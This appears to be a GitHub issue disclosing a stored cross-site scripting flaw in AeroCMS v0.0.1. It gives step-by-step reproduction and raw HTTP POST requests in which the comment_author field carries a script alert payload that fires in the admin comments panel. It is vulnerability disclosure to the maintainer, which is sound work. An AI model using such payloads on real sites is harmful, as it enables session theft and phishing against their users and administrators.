search

MegaTKC / AeroCMS

Aero is a simple and easy to use CMS (Content Management System) designed to create fast and powerful web applications!
GNU General Public License v2.0
23 stars 6 forks source link

Stored XSS Vulnerability on AeroCMS v0.0.1 #11

Open rahadchowdhury opened 1 year ago

rahadchowdhury commented 1 year ago

Description: I found Stored Cross site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section "Author" and "Content" field. When I use malicious code or use any xss payload then the browser give me result. Because a browser can not know if the script should be trusted or not.

CMS Version: v0.0.1

Affected URL: http://127.0.0.1/AeroCMS/post.php

Steps to Reproduce:

  1. At first open any post.
  2. then fill up comments section and your request data will be

POST /AeroCMS/post.php?p_id=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 86 Origin: http://127.0.0.1 Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea Connection: close

comment_author=test&comment_email=test@test.com&comment_content=test&create_comment=

  1. "comment_author" and "comment_content" parameters are vulnerable. Let's try to use any XSS payload in "comment_author" and "comment_content" parameters and your request data will be

POST /AeroCMS/post.php?p_id=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 86 Origin: http://127.0.0.1 Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea Connection: close

comment_author=test">script>alert(111)</script>&comment_email=test@test.com&comment_content=test"&create_comment=

1 2

  1. Now login admin panel and go to "Comments" Menu
  2. You will see XSS pop up (If admin approve comment so XSS pop up execute in post section).

3 4 5

Proof of Concept: You can see the Proof of Concept. which I've attached screenshots and video to confirm the vulnerability.

https://user-images.githubusercontent.com/41516016/224820020-0f0cc2cb-30a1-4722-9ef1-7c14133bf767.mp4

Impact: Attackers can make use of this to conduct attacks like phishing, steal sessions etc.

Let me know if any further info is required.

Thanks & Regards Rahad Chowdhury Cyber Security Specialist https://www.linkedin.com/in/rahadchowdhury/